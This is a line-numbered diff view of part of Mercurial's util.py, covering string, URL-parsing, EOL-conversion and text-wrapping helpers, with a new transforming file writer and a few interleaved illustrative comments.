2300 2300 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2301 2301
2302 2302 exact matching (no prefix):
2303 2303 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2304 2304 ('literal', 'abcdefg', [False, False, True])
2305 2305
2306 2306 regex matching ('re:' prefix)
2307 2307 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2308 2308 ('re', 'a.+b', [False, False, True])
2309 2309
2310 2310 force exact matches ('literal:' prefix)
2311 2311 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2312 2312 ('literal', 're:foobar', [False, True])
2313 2313
2314 2314 unknown prefixes are ignored and treated as literals
2315 2315 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2316 2316 ('literal', 'foo:bar', [False, False, True])
2317 2317
2318 2318 case insensitive regex matches
2319 2319 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2320 2320 ('re', 'A.+b', [False, False, True])
2321 2321
2322 2322 case insensitive literal matches
2323 2323 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2324 2324 ('literal', 'ABCDEFG', [False, False, True])
2325 2325 """
2326 2326 if pattern.startswith('re:'):
2327 2327 pattern = pattern[3:]
2328 2328 try:
2329 2329 flags = 0
2330 2330 if not casesensitive:
2331 2331 flags = remod.I
2332 2332 regex = remod.compile(pattern, flags)
2333 2333 except remod.error as e:
2334 2334 raise error.ParseError(_('invalid regular expression: %s')
2335 2335 % e)
2336 2336 return 're', pattern, regex.search
2337 2337 elif pattern.startswith('literal:'):
2338 2338 pattern = pattern[8:]
2339 2339
2340 2340 match = pattern.__eq__
2341 2341
2342 2342 if not casesensitive:
2343 2343 ipat = encoding.lower(pattern)
2344 2344 match = lambda s: ipat == encoding.lower(s)
2345 2345 return 'literal', pattern, match
2346 2346
2347 2347 def shortuser(user):
2348 2348 """Return a short representation of a user name or email address."""
2349 2349 f = user.find('@')
2350 2350 if f >= 0:
2351 2351 user = user[:f]
2352 2352 f = user.find('<')
2353 2353 if f >= 0:
2354 2354 user = user[f + 1:]
2355 2355 f = user.find(' ')
2356 2356 if f >= 0:
2357 2357 user = user[:f]
2358 2358 f = user.find('.')
2359 2359 if f >= 0:
2360 2360 user = user[:f]
2361 2361 return user
2362 2362
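# Illustrative sketch (not part of the original file): the filters above
# reduce a full address to a short login-like name.
#
#   shortuser(b'John Doe <john.doe@example.com>') -> b'john'
#
# (everything from '@' on is dropped, then everything up to '<', then the
# result is truncated at the first space or '.')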
2363 2363 def emailuser(user):
2364 2364 """Return the user portion of an email address."""
2365 2365 f = user.find('@')
2366 2366 if f >= 0:
2367 2367 user = user[:f]
2368 2368 f = user.find('<')
2369 2369 if f >= 0:
2370 2370 user = user[f + 1:]
2371 2371 return user
2372 2372
2373 2373 def email(author):
2374 2374 '''get email of author.'''
2375 2375 r = author.find('>')
2376 2376 if r == -1:
2377 2377 r = None
2378 2378 return author[author.find('<') + 1:r]
2379 2379
2380 2380 def ellipsis(text, maxlength=400):
2381 2381 """Trim string to at most maxlength (default: 400) columns in display."""
2382 2382 return encoding.trim(text, maxlength, ellipsis='...')
2383 2383
2384 2384 def unitcountfn(*unittable):
2385 2385 '''return a function that renders a readable count of some quantity'''
2386 2386
2387 2387 def go(count):
2388 2388 for multiplier, divisor, format in unittable:
2389 2389 if abs(count) >= divisor * multiplier:
2390 2390 return format % (count / float(divisor))
2391 2391 return unittable[-1][2] % count
2392 2392
2393 2393 return go
2394 2394
2395 2395 def processlinerange(fromline, toline):
2396 2396 """Check that linerange <fromline>:<toline> makes sense and return a
2397 2397 0-based range.
2398 2398
2399 2399 >>> processlinerange(10, 20)
2400 2400 (9, 20)
2401 2401 >>> processlinerange(2, 1)
2402 2402 Traceback (most recent call last):
2403 2403 ...
2404 2404 ParseError: line range must be positive
2405 2405 >>> processlinerange(0, 5)
2406 2406 Traceback (most recent call last):
2407 2407 ...
2408 2408 ParseError: fromline must be strictly positive
2409 2409 """
2410 2410 if toline - fromline < 0:
2411 2411 raise error.ParseError(_("line range must be positive"))
2412 2412 if fromline < 1:
2413 2413 raise error.ParseError(_("fromline must be strictly positive"))
2414 2414 return fromline - 1, toline
2415 2415
2416 2416 bytecount = unitcountfn(
2417 2417 (100, 1 << 30, _('%.0f GB')),
2418 2418 (10, 1 << 30, _('%.1f GB')),
2419 2419 (1, 1 << 30, _('%.2f GB')),
2420 2420 (100, 1 << 20, _('%.0f MB')),
2421 2421 (10, 1 << 20, _('%.1f MB')),
2422 2422 (1, 1 << 20, _('%.2f MB')),
2423 2423 (100, 1 << 10, _('%.0f KB')),
2424 2424 (10, 1 << 10, _('%.1f KB')),
2425 2425 (1, 1 << 10, _('%.2f KB')),
2426 2426 (1, 1, _('%.0f bytes')),
2427 2427 )
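# Illustrative sketch (not part of the original file): bytecount picks the
# first row whose threshold (multiplier * divisor) the value reaches,
# yielding three significant digits (assuming the C locale for _()):
#
#   bytecount(2252)       -> '2.20 KB'
#   bytecount(10 * 2**20) -> '10.0 MB'
#   bytecount(500)        -> '500 bytes'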
2428 2428
2429 class transformingwriter(object):
2430 """Writable file wrapper to transform data by function"""
2431
2432 def __init__(self, fp, encode):
2433 self._fp = fp
2434 self._encode = encode
2435
2436 def close(self):
2437 self._fp.close()
2438
2439 def flush(self):
2440 self._fp.flush()
2441
2442 def write(self, data):
2443 return self._fp.write(self._encode(data))
2444
2429 2445 # Matches a single EOL which can either be a CRLF where repeated CR
2430 2446 # are removed or a LF. We do not care about old Macintosh files, so a
2431 2447 # stray CR is an error.
2432 2448 _eolre = remod.compile(br'\r*\n')
2433 2449
2434 2450 def tolf(s):
2435 2451 return _eolre.sub('\n', s)
2436 2452
2437 2453 def tocrlf(s):
2438 2454 return _eolre.sub('\r\n', s)
2439 2455
2456 def _crlfwriter(fp):
2457 return transformingwriter(fp, tocrlf)
2458
2440 2459 if pycompat.oslinesep == '\r\n':
2441 2460 tonativeeol = tocrlf
2442 2461 fromnativeeol = tolf
2462 nativeeolwriter = _crlfwriter
2443 2463 else:
2444 2464 tonativeeol = pycompat.identity
2445 2465 fromnativeeol = pycompat.identity
2466 nativeeolwriter = pycompat.identity
2446 2467
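# Illustrative sketch (not part of the original file): on platforms where
# os.linesep is '\r\n', nativeeolwriter wraps a binary file object so that
# LF-normalized content is written out with CRLF line endings while
# remaining byte-oriented; elsewhere the file object is returned unchanged.
def _nativeeolwriterdemo(fp):
    # 'fp' is any file object opened in binary mode, e.g. for a patch file
    out = nativeeolwriter(fp)
    out.write(b'diff --git a/f b/f\n')  # stored as b'...\r\n' on Windows
    out.flush()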
2447 2468 def escapestr(s):
2448 2469 # call underlying function of s.encode('string_escape') directly for
2449 2470 # Python 3 compatibility
2450 2471 return codecs.escape_encode(s)[0]
2451 2472
2452 2473 def unescapestr(s):
2453 2474 return codecs.escape_decode(s)[0]
2454 2475
2455 2476 def forcebytestr(obj):
2456 2477 """Portably format an arbitrary object (e.g. exception) into a byte
2457 2478 string."""
2458 2479 try:
2459 2480 return pycompat.bytestr(obj)
2460 2481 except UnicodeEncodeError:
2461 2482 # non-ascii string, may be lossy
2462 2483 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2463 2484
2464 2485 def uirepr(s):
2465 2486 # Avoid double backslash in Windows path repr()
2466 2487 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2467 2488
2468 2489 # delay import of textwrap
2469 2490 def MBTextWrapper(**kwargs):
2470 2491 class tw(textwrap.TextWrapper):
2471 2492 """
2472 2493 Extend TextWrapper for width-awareness.
2473 2494
2474 2495 Neither the number of 'bytes' in any encoding nor the number of
2475 2496 'characters' is appropriate for calculating terminal columns of a string.
2476 2497 
2477 2498 The original TextWrapper implementation uses the built-in 'len()'
2478 2499 directly, so overriding is needed to use the width information of each character.
2479 2500 
2480 2501 In addition, characters classified as 'ambiguous' width are
2481 2502 treated as wide in East Asian locales, but as narrow elsewhere.
2482 2503 
2483 2504 This requires a user decision to determine the width of such characters.
2484 2505 """
2485 2506 def _cutdown(self, ucstr, space_left):
2486 2507 l = 0
2487 2508 colwidth = encoding.ucolwidth
2488 2509 for i in xrange(len(ucstr)):
2489 2510 l += colwidth(ucstr[i])
2490 2511 if space_left < l:
2491 2512 return (ucstr[:i], ucstr[i:])
2492 2513 return ucstr, ''
2493 2514
2494 2515 # overriding of base class
2495 2516 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2496 2517 space_left = max(width - cur_len, 1)
2497 2518
2498 2519 if self.break_long_words:
2499 2520 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2500 2521 cur_line.append(cut)
2501 2522 reversed_chunks[-1] = res
2502 2523 elif not cur_line:
2503 2524 cur_line.append(reversed_chunks.pop())
2504 2525
2505 2526 # this overriding code is imported from TextWrapper of Python 2.6
2506 2527 # to calculate columns of string by 'encoding.ucolwidth()'
2507 2528 def _wrap_chunks(self, chunks):
2508 2529 colwidth = encoding.ucolwidth
2509 2530
2510 2531 lines = []
2511 2532 if self.width <= 0:
2512 2533 raise ValueError("invalid width %r (must be > 0)" % self.width)
2513 2534
2514 2535 # Arrange in reverse order so items can be efficiently popped
2515 2536 # from a stack of chunks.
2516 2537 chunks.reverse()
2517 2538
2518 2539 while chunks:
2519 2540
2520 2541 # Start the list of chunks that will make up the current line.
2521 2542 # cur_len is just the length of all the chunks in cur_line.
2522 2543 cur_line = []
2523 2544 cur_len = 0
2524 2545
2525 2546 # Figure out which static string will prefix this line.
2526 2547 if lines:
2527 2548 indent = self.subsequent_indent
2528 2549 else:
2529 2550 indent = self.initial_indent
2530 2551
2531 2552 # Maximum width for this line.
2532 2553 width = self.width - len(indent)
2533 2554
2534 2555 # First chunk on line is whitespace -- drop it, unless this
2535 2556 # is the very beginning of the text (i.e. no lines started yet).
2536 2557 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2537 2558 del chunks[-1]
2538 2559
2539 2560 while chunks:
2540 2561 l = colwidth(chunks[-1])
2541 2562
2542 2563 # Can at least squeeze this chunk onto the current line.
2543 2564 if cur_len + l <= width:
2544 2565 cur_line.append(chunks.pop())
2545 2566 cur_len += l
2546 2567
2547 2568 # Nope, this line is full.
2548 2569 else:
2549 2570 break
2550 2571
2551 2572 # The current line is full, and the next chunk is too big to
2552 2573 # fit on *any* line (not just this one).
2553 2574 if chunks and colwidth(chunks[-1]) > width:
2554 2575 self._handle_long_word(chunks, cur_line, cur_len, width)
2555 2576
2556 2577 # If the last chunk on this line is all whitespace, drop it.
2557 2578 if (self.drop_whitespace and
2558 2579 cur_line and cur_line[-1].strip() == r''):
2559 2580 del cur_line[-1]
2560 2581
2561 2582 # Convert current line back to a string and store it in list
2562 2583 # of all lines (return value).
2563 2584 if cur_line:
2564 2585 lines.append(indent + r''.join(cur_line))
2565 2586
2566 2587 return lines
2567 2588
2568 2589 global MBTextWrapper
2569 2590 MBTextWrapper = tw
2570 2591 return tw(**kwargs)
2571 2592
2572 2593 def wrap(line, width, initindent='', hangindent=''):
2573 2594 maxindent = max(len(hangindent), len(initindent))
2574 2595 if width <= maxindent:
2575 2596 # adjust for weird terminal size
2576 2597 width = max(78, maxindent + 1)
2577 2598 line = line.decode(pycompat.sysstr(encoding.encoding),
2578 2599 pycompat.sysstr(encoding.encodingmode))
2579 2600 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2580 2601 pycompat.sysstr(encoding.encodingmode))
2581 2602 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2582 2603 pycompat.sysstr(encoding.encodingmode))
2583 2604 wrapper = MBTextWrapper(width=width,
2584 2605 initial_indent=initindent,
2585 2606 subsequent_indent=hangindent)
2586 2607 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2587 2608
2588 2609 if (pyplatform.python_implementation() == 'CPython' and
2589 2610 sys.version_info < (3, 0)):
2590 2611 # There is an issue in CPython that some IO methods do not handle EINTR
2591 2612 # correctly. The following table shows what CPython version (and functions)
2592 2613 # are affected (buggy: has the EINTR bug, okay: otherwise):
2593 2614 #
2594 2615 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2595 2616 # --------------------------------------------------
2596 2617 # fp.__iter__ | buggy | buggy | okay
2597 2618 # fp.read* | buggy | okay [1] | okay
2598 2619 #
2599 2620 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2600 2621 #
2601 2622 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2602 2623 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2603 2624 #
2604 2625 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2605 2626 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2606 2627 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2607 2628 # fp.__iter__ but not other fp.read* methods.
2608 2629 #
2609 2630 # On modern systems like Linux, the "read" syscall cannot be interrupted
2610 2631 # when reading "fast" files like on-disk files. So the EINTR issue only
2611 2632 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2612 2633 # files approximately as "fast" files and use the fast (unsafe) code path,
2613 2634 # to minimize the performance impact.
2614 2635 if sys.version_info >= (2, 7, 4):
2615 2636 # fp.readline deals with EINTR correctly, use it as a workaround.
2616 2637 def _safeiterfile(fp):
2617 2638 return iter(fp.readline, '')
2618 2639 else:
2619 2640 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2620 2641 # note: this may block longer than necessary because of bufsize.
2621 2642 def _safeiterfile(fp, bufsize=4096):
2622 2643 fd = fp.fileno()
2623 2644 line = ''
2624 2645 while True:
2625 2646 try:
2626 2647 buf = os.read(fd, bufsize)
2627 2648 except OSError as ex:
2628 2649 # os.read only raises EINTR before any data is read
2629 2650 if ex.errno == errno.EINTR:
2630 2651 continue
2631 2652 else:
2632 2653 raise
2633 2654 line += buf
2634 2655 if '\n' in buf:
2635 2656 splitted = line.splitlines(True)
2636 2657 line = ''
2637 2658 for l in splitted:
2638 2659 if l[-1] == '\n':
2639 2660 yield l
2640 2661 else:
2641 2662 line = l
2642 2663 if not buf:
2643 2664 break
2644 2665 if line:
2645 2666 yield line
2646 2667
2647 2668 def iterfile(fp):
2648 2669 fastpath = True
2649 2670 if type(fp) is file:
2650 2671 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2651 2672 if fastpath:
2652 2673 return fp
2653 2674 else:
2654 2675 return _safeiterfile(fp)
2655 2676 else:
2656 2677 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2657 2678 def iterfile(fp):
2658 2679 return fp
2659 2680
2660 2681 def iterlines(iterator):
2661 2682 for chunk in iterator:
2662 2683 for line in chunk.splitlines():
2663 2684 yield line
2664 2685
2665 2686 def expandpath(path):
2666 2687 return os.path.expanduser(os.path.expandvars(path))
2667 2688
2668 2689 def hgcmd():
2669 2690 """Return the command used to execute current hg
2670 2691
2671 2692 This is different from hgexecutable() because on Windows we want
2672 2693 to avoid things opening new shell windows like batch files, so we
2673 2694 get either the python call or current executable.
2674 2695 """
2675 2696 if mainfrozen():
2676 2697 if getattr(sys, 'frozen', None) == 'macosx_app':
2677 2698 # Env variable set by py2app
2678 2699 return [encoding.environ['EXECUTABLEPATH']]
2679 2700 else:
2680 2701 return [pycompat.sysexecutable]
2681 2702 return gethgcmd()
2682 2703
2683 2704 def rundetached(args, condfn):
2684 2705 """Execute the argument list in a detached process.
2685 2706
2686 2707 condfn is a callable which is called repeatedly and should return
2687 2708 True once the child process is known to have started successfully.
2688 2709 At this point, the child process PID is returned. If the child
2689 2710 process fails to start or finishes before condfn() evaluates to
2690 2711 True, return -1.
2691 2712 """
2692 2713 # Windows case is easier because the child process is either
2693 2714 # successfully starting and validating the condition or exiting
2694 2715 # on failure. We just poll on its PID. On Unix, if the child
2695 2716 # process fails to start, it will be left in a zombie state until
2696 2717 # the parent wait on it, which we cannot do since we expect a long
2697 2718 # running process on success. Instead we listen for SIGCHLD telling
2698 2719 # us our child process terminated.
2699 2720 terminated = set()
2700 2721 def handler(signum, frame):
2701 2722 terminated.add(os.wait())
2702 2723 prevhandler = None
2703 2724 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2704 2725 if SIGCHLD is not None:
2705 2726 prevhandler = signal.signal(SIGCHLD, handler)
2706 2727 try:
2707 2728 pid = spawndetached(args)
2708 2729 while not condfn():
2709 2730 if ((pid in terminated or not testpid(pid))
2710 2731 and not condfn()):
2711 2732 return -1
2712 2733 time.sleep(0.1)
2713 2734 return pid
2714 2735 finally:
2715 2736 if prevhandler is not None:
2716 2737 signal.signal(signal.SIGCHLD, prevhandler)
2717 2738
2718 2739 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2719 2740 """Return the result of interpolating items in the mapping into string s.
2720 2741
2721 2742 prefix is a single character string, or a two character string with
2722 2743 a backslash as the first character if the prefix needs to be escaped in
2723 2744 a regular expression.
2724 2745
2725 2746 fn is an optional function that will be applied to the replacement text
2726 2747 just before replacement.
2727 2748
2728 2749 escape_prefix is an optional flag that allows using doubled prefix for
2729 2750 its escaping.
2730 2751 """
2731 2752 fn = fn or (lambda s: s)
2732 2753 patterns = '|'.join(mapping.keys())
2733 2754 if escape_prefix:
2734 2755 patterns += '|' + prefix
2735 2756 if len(prefix) > 1:
2736 2757 prefix_char = prefix[1:]
2737 2758 else:
2738 2759 prefix_char = prefix
2739 2760 mapping[prefix_char] = prefix_char
2740 2761 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2741 2762 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2742 2763
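# Illustrative sketch (not part of the original file):
#
#   interpolate(b'%', {b'foo': b'bar'}, b'say %foo')  -> b'say bar'
#
# with escape_prefix=True a doubled prefix escapes itself:
#
#   interpolate(b'%', {b'foo': b'bar'}, b'100%% sure',
#               escape_prefix=True)                    -> b'100% sure'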
2743 2764 def getport(port):
2744 2765 """Return the port for a given network service.
2745 2766
2746 2767 If port is an integer, it's returned as is. If it's a string, it's
2747 2768 looked up using socket.getservbyname(). If there's no matching
2748 2769 service, error.Abort is raised.
2749 2770 """
2750 2771 try:
2751 2772 return int(port)
2752 2773 except ValueError:
2753 2774 pass
2754 2775
2755 2776 try:
2756 2777 return socket.getservbyname(pycompat.sysstr(port))
2757 2778 except socket.error:
2758 2779 raise Abort(_("no port number associated with service '%s'") % port)
2759 2780
2760 2781 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2761 2782 '0': False, 'no': False, 'false': False, 'off': False,
2762 2783 'never': False}
2763 2784
2764 2785 def parsebool(s):
2765 2786 """Parse s into a boolean.
2766 2787
2767 2788 If s is not a valid boolean, returns None.
2768 2789 """
2769 2790 return _booleans.get(s.lower(), None)
2770 2791
2771 2792 _hextochr = dict((a + b, chr(int(a + b, 16)))
2772 2793 for a in string.hexdigits for b in string.hexdigits)
2773 2794
2774 2795 class url(object):
2775 2796 r"""Reliable URL parser.
2776 2797
2777 2798 This parses URLs and provides attributes for the following
2778 2799 components:
2779 2800
2780 2801 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2781 2802
2782 2803 Missing components are set to None. The only exception is
2783 2804 fragment, which is set to '' if present but empty.
2784 2805
2785 2806 If parsefragment is False, fragment is included in query. If
2786 2807 parsequery is False, query is included in path. If both are
2787 2808 False, both fragment and query are included in path.
2788 2809
2789 2810 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2790 2811
2791 2812 Note that for backward compatibility reasons, bundle URLs do not
2792 2813 take host names. That means 'bundle://../' has a path of '../'.
2793 2814
2794 2815 Examples:
2795 2816
2796 2817 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2797 2818 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2798 2819 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2799 2820 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2800 2821 >>> url(b'file:///home/joe/repo')
2801 2822 <url scheme: 'file', path: '/home/joe/repo'>
2802 2823 >>> url(b'file:///c:/temp/foo/')
2803 2824 <url scheme: 'file', path: 'c:/temp/foo/'>
2804 2825 >>> url(b'bundle:foo')
2805 2826 <url scheme: 'bundle', path: 'foo'>
2806 2827 >>> url(b'bundle://../foo')
2807 2828 <url scheme: 'bundle', path: '../foo'>
2808 2829 >>> url(br'c:\foo\bar')
2809 2830 <url path: 'c:\\foo\\bar'>
2810 2831 >>> url(br'\\blah\blah\blah')
2811 2832 <url path: '\\\\blah\\blah\\blah'>
2812 2833 >>> url(br'\\blah\blah\blah#baz')
2813 2834 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2814 2835 >>> url(br'file:///C:\users\me')
2815 2836 <url scheme: 'file', path: 'C:\\users\\me'>
2816 2837
2817 2838 Authentication credentials:
2818 2839
2819 2840 >>> url(b'ssh://joe:xyz@x/repo')
2820 2841 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2821 2842 >>> url(b'ssh://joe@x/repo')
2822 2843 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2823 2844
2824 2845 Query strings and fragments:
2825 2846
2826 2847 >>> url(b'http://host/a?b#c')
2827 2848 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2828 2849 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2829 2850 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2830 2851
2831 2852 Empty path:
2832 2853
2833 2854 >>> url(b'')
2834 2855 <url path: ''>
2835 2856 >>> url(b'#a')
2836 2857 <url path: '', fragment: 'a'>
2837 2858 >>> url(b'http://host/')
2838 2859 <url scheme: 'http', host: 'host', path: ''>
2839 2860 >>> url(b'http://host/#a')
2840 2861 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2841 2862
2842 2863 Only scheme:
2843 2864
2844 2865 >>> url(b'http:')
2845 2866 <url scheme: 'http'>
2846 2867 """
2847 2868
2848 2869 _safechars = "!~*'()+"
2849 2870 _safepchars = "/!~*'()+:\\"
2850 2871 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2851 2872
2852 2873 def __init__(self, path, parsequery=True, parsefragment=True):
2853 2874 # We slowly chomp away at path until we have only the path left
2854 2875 self.scheme = self.user = self.passwd = self.host = None
2855 2876 self.port = self.path = self.query = self.fragment = None
2856 2877 self._localpath = True
2857 2878 self._hostport = ''
2858 2879 self._origpath = path
2859 2880
2860 2881 if parsefragment and '#' in path:
2861 2882 path, self.fragment = path.split('#', 1)
2862 2883
2863 2884 # special case for Windows drive letters and UNC paths
2864 2885 if hasdriveletter(path) or path.startswith('\\\\'):
2865 2886 self.path = path
2866 2887 return
2867 2888
2868 2889 # For compatibility reasons, we can't handle bundle paths as
2869 2890 # normal URLS
2870 2891 if path.startswith('bundle:'):
2871 2892 self.scheme = 'bundle'
2872 2893 path = path[7:]
2873 2894 if path.startswith('//'):
2874 2895 path = path[2:]
2875 2896 self.path = path
2876 2897 return
2877 2898
2878 2899 if self._matchscheme(path):
2879 2900 parts = path.split(':', 1)
2880 2901 if parts[0]:
2881 2902 self.scheme, path = parts
2882 2903 self._localpath = False
2883 2904
2884 2905 if not path:
2885 2906 path = None
2886 2907 if self._localpath:
2887 2908 self.path = ''
2888 2909 return
2889 2910 else:
2890 2911 if self._localpath:
2891 2912 self.path = path
2892 2913 return
2893 2914
2894 2915 if parsequery and '?' in path:
2895 2916 path, self.query = path.split('?', 1)
2896 2917 if not path:
2897 2918 path = None
2898 2919 if not self.query:
2899 2920 self.query = None
2900 2921
2901 2922 # // is required to specify a host/authority
2902 2923 if path and path.startswith('//'):
2903 2924 parts = path[2:].split('/', 1)
2904 2925 if len(parts) > 1:
2905 2926 self.host, path = parts
2906 2927 else:
2907 2928 self.host = parts[0]
2908 2929 path = None
2909 2930 if not self.host:
2910 2931 self.host = None
2911 2932 # path of file:///d is /d
2912 2933 # path of file:///d:/ is d:/, not /d:/
2913 2934 if path and not hasdriveletter(path):
2914 2935 path = '/' + path
2915 2936
2916 2937 if self.host and '@' in self.host:
2917 2938 self.user, self.host = self.host.rsplit('@', 1)
2918 2939 if ':' in self.user:
2919 2940 self.user, self.passwd = self.user.split(':', 1)
2920 2941 if not self.host:
2921 2942 self.host = None
2922 2943
2923 2944 # Don't split on colons in IPv6 addresses without ports
2924 2945 if (self.host and ':' in self.host and
2925 2946 not (self.host.startswith('[') and self.host.endswith(']'))):
2926 2947 self._hostport = self.host
2927 2948 self.host, self.port = self.host.rsplit(':', 1)
2928 2949 if not self.host:
2929 2950 self.host = None
2930 2951
2931 2952 if (self.host and self.scheme == 'file' and
2932 2953 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2933 2954 raise Abort(_('file:// URLs can only refer to localhost'))
2934 2955
2935 2956 self.path = path
2936 2957
2937 2958 # leave the query string escaped
2938 2959 for a in ('user', 'passwd', 'host', 'port',
2939 2960 'path', 'fragment'):
2940 2961 v = getattr(self, a)
2941 2962 if v is not None:
2942 2963 setattr(self, a, urlreq.unquote(v))
2943 2964
2944 2965 @encoding.strmethod
2945 2966 def __repr__(self):
2946 2967 attrs = []
2947 2968 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2948 2969 'query', 'fragment'):
2949 2970 v = getattr(self, a)
2950 2971 if v is not None:
2951 2972 attrs.append('%s: %r' % (a, v))
2952 2973 return '<url %s>' % ', '.join(attrs)
2953 2974
2954 2975 def __bytes__(self):
2955 2976 r"""Join the URL's components back into a URL string.
2956 2977
2957 2978 Examples:
2958 2979
2959 2980 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2960 2981 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2961 2982 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2962 2983 'http://user:pw@host:80/?foo=bar&baz=42'
2963 2984 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2964 2985 'http://user:pw@host:80/?foo=bar%3dbaz'
2965 2986 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2966 2987 'ssh://user:pw@[::1]:2200//home/joe#'
2967 2988 >>> bytes(url(b'http://localhost:80//'))
2968 2989 'http://localhost:80//'
2969 2990 >>> bytes(url(b'http://localhost:80/'))
2970 2991 'http://localhost:80/'
2971 2992 >>> bytes(url(b'http://localhost:80'))
2972 2993 'http://localhost:80/'
2973 2994 >>> bytes(url(b'bundle:foo'))
2974 2995 'bundle:foo'
2975 2996 >>> bytes(url(b'bundle://../foo'))
2976 2997 'bundle:../foo'
2977 2998 >>> bytes(url(b'path'))
2978 2999 'path'
2979 3000 >>> bytes(url(b'file:///tmp/foo/bar'))
2980 3001 'file:///tmp/foo/bar'
2981 3002 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2982 3003 'file:///c:/tmp/foo/bar'
2983 3004 >>> print(url(br'bundle:foo\bar'))
2984 3005 bundle:foo\bar
2985 3006 >>> print(url(br'file:///D:\data\hg'))
2986 3007 file:///D:\data\hg
2987 3008 """
2988 3009 if self._localpath:
2989 3010 s = self.path
2990 3011 if self.scheme == 'bundle':
2991 3012 s = 'bundle:' + s
2992 3013 if self.fragment:
2993 3014 s += '#' + self.fragment
2994 3015 return s
2995 3016
2996 3017 s = self.scheme + ':'
2997 3018 if self.user or self.passwd or self.host:
2998 3019 s += '//'
2999 3020 elif self.scheme and (not self.path or self.path.startswith('/')
3000 3021 or hasdriveletter(self.path)):
3001 3022 s += '//'
3002 3023 if hasdriveletter(self.path):
3003 3024 s += '/'
3004 3025 if self.user:
3005 3026 s += urlreq.quote(self.user, safe=self._safechars)
3006 3027 if self.passwd:
3007 3028 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3008 3029 if self.user or self.passwd:
3009 3030 s += '@'
3010 3031 if self.host:
3011 3032 if not (self.host.startswith('[') and self.host.endswith(']')):
3012 3033 s += urlreq.quote(self.host)
3013 3034 else:
3014 3035 s += self.host
3015 3036 if self.port:
3016 3037 s += ':' + urlreq.quote(self.port)
3017 3038 if self.host:
3018 3039 s += '/'
3019 3040 if self.path:
3020 3041 # TODO: similar to the query string, we should not unescape the
3021 3042 # path when we store it, the path might contain '%2f' = '/',
3022 3043 # which we should *not* escape.
3023 3044 s += urlreq.quote(self.path, safe=self._safepchars)
3024 3045 if self.query:
3025 3046 # we store the query in escaped form.
3026 3047 s += '?' + self.query
3027 3048 if self.fragment is not None:
3028 3049 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3029 3050 return s
3030 3051
3031 3052 __str__ = encoding.strmethod(__bytes__)
3032 3053
3033 3054 def authinfo(self):
3034 3055 user, passwd = self.user, self.passwd
3035 3056 try:
3036 3057 self.user, self.passwd = None, None
3037 3058 s = bytes(self)
3038 3059 finally:
3039 3060 self.user, self.passwd = user, passwd
3040 3061 if not self.user:
3041 3062 return (s, None)
3042 3063 # authinfo[1] is passed to urllib2 password manager, and its
3043 3064 # URIs must not contain credentials. The host is passed in the
3044 3065 # URIs list because Python < 2.4.3 uses only that to search for
3045 3066 # a password.
3046 3067 return (s, (None, (s, self.host),
3047 3068 self.user, self.passwd or ''))
3048 3069
3049 3070 def isabs(self):
3050 3071 if self.scheme and self.scheme != 'file':
3051 3072 return True # remote URL
3052 3073 if hasdriveletter(self.path):
3053 3074 return True # absolute for our purposes - can't be joined()
3054 3075 if self.path.startswith(br'\\'):
3055 3076 return True # Windows UNC path
3056 3077 if self.path.startswith('/'):
3057 3078 return True # POSIX-style
3058 3079 return False
3059 3080
3060 3081 def localpath(self):
3061 3082 if self.scheme == 'file' or self.scheme == 'bundle':
